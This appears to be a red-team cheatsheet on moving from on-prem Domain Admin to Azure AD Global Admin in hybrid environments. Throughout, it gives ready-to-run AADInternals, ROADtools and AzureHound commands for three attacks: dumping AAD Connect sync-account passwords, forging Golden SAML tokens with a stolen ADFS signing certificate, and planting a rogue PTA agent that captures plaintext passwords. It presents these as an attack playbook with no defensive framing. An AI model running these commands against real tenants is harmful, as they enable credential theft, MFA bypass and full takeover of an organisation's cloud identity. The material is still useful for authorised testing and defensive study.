What It Is
Once Domain Admin is achieved, the next objective in hybrid AD/Azure AD environments is often Global Admin in Azure AD/Entra ID. Several sync and federation components bridge on-prem AD to Azure AD, abusing them lets a DA pivot into full control of the cloud tenant without ever touching an Azure AD credential directly.
Another reference is available here: Privesc to Global Admin Cheatsheet
Attack Flow
DA on-prem → identify AAD Connect / ADFS / PTA infrastructure
→ extract sync account creds OR forge SAML tokens OR hijack PTA agent
→ authenticate to Azure AD as Global Admin / any user
→ recon tenant with ROADtools/AzureHoundPath 1 - Azure AD Connect / AAD Connect Sync Account Abuse
What It Is
The AAD Connect server holds a sync account (MSOL_* or similar) with Directory Synchronization Accounts rights in Azure AD, enough to reset the password of any cloud user, including Global Admins, unless protected by PIM/MFA.
# Identify the AAD Connect server — usually named ADSync, AADConnect, or similar
nxc smb 10.10.10.0/24 -u <username> -p <password> --shares | grep -i sync
# On the AAD Connect server (once local admin/DA), dump the sync account credentials
# AADInternals is the standard tool for this — run from PowerShell on the target
Import-Module AADInternals
Get-AADIntSyncCredentials# Returns:
# MSOL_xxxxxxxxxxxx account name
# Plaintext password for the sync account# Authenticate to Azure AD as the sync account
Connect-MsolService -Credential (Get-Credential)
# Or with AADInternals directly
Get-AADIntAccessTokenForAADGraph -Credentials $credsWhat the Sync Account Can Do
| Right | Impact |
|---|---|
| Reset password of any cloud-only user | Take over Global Admin account directly |
| Reset password of any hybrid user (limited) | Escalate to synced Global Admin accounts |
| Read full directory | Full tenant recon |
# Reset target user's password using compromised sync account (AADInternals)
Set-AADIntUserPassword -AccessToken $token -UserPrincipalName '<admin>@<tenant>.onmicrosoft.com' -Password '<newpassword>'Path 2 - Golden SAML (ADFS)
What It Is
If the environment uses ADFS for federation, extracting the ADFS token-signing certificate lets an attacker forge SAML tokens for any user in the federated domain, including Global Admins, without ever touching Azure AD authentication.
# On the ADFS server (requires DA / local admin), extract the token-signing certificate
Import-Module AADInternals
Export-AADIntADFSSigningCertificate
# Also extract encryption certificate if needed
Export-AADIntADFSEncryptionCertificate# Forge a SAML token impersonating a target user
$token = New-AADIntSAMLToken `
-ImmutableID '<user-immutable-id>' `
-PfxFileName 'ADFSSigningCertificate.pfx' `
-PfxPassword '' `
-Issuer 'http://<adfs-server>/adfs/services/trust'
# Use forged token to get an Azure AD access token
Get-AADIntAccessTokenForAADGraph -SAMLToken $tokenPath 3 - Pass-Through Authentication (PTA) Agent Registration
What It Is
If the tenant uses PTA instead of password hash sync, an attacker with DA can register a rogue PTA agent on any domain-joined machine. The rogue agent intercepts every authentication request sent through it, meaning it sees plaintext passwords for any user who logs into Azure AD, and can also approve logins as any user without knowing their password.
# Register a new (rogue) PTA agent using compromised Global Admin/sync creds
Import-Module AADInternals
Set-AADIntPTASpy -Path C:\PTASpy
Register-AADIntPTAAgent -Credentials $creds -MachineName '<rogue-agent-name>'# Start intercepting/authenticating as any user
Start-AADIntPTASpy
# Review captured plaintext credentials
Get-AADIntPTASpyLogsRecon Once You Have Cloud Access
ROADrecon / ROADtools
# Authenticate — device code flow (works around some Conditional Access policies)
roadrecon auth -u '<user>@<tenant>.onmicrosoft.com' -p '<password>'
# Or with a stolen token
roadrecon auth --access-token '<token>'
# Gather full tenant data
roadrecon gather
# Launch the GUI for browsing users, groups, apps, roles
roadrecon gui# Query directly from the database
roadrecon plugin -h # list available analysis pluginsAzureHound (BloodHound for Azure)
# Collect Azure AD data — feeds into BloodHound the same as on-prem AD
azurehound -u '<user>@<tenant>.onmicrosoft.com' -p '<password>' -t '<tenant-id>' list -o azure_data.json
# Import azure_data.json into BloodHound alongside on-prem data
# Run: Find Shortest Paths to Global AdminsLocating Global Admins
# Via ROADrecon — dump directory role assignments
roadrecon dump -o roadrecon_dump
grep -i "Global Administrator" roadrecon_dump/*
# Via Microsoft Graph / az cli, if authenticated
az ad signed-in-user list-owned-objects
az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles" \
| jq '.value[] | select(.displayName=="Global Administrator")'
# List members of the Global Administrator role
az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/<role-id>/members"What Each Path Gives You
| Path | Outcome |
|---|---|
| AAD Connect sync account | Reset any cloud user password, including GA |
| Golden SAML (ADFS) | Forge tokens for any federated user, bypass MFA entirely |
| Rogue PTA agent | Capture plaintext creds, approve logins as any user |
| ROADrecon/AzureHound | Full tenant map, identify GA members and paths to them |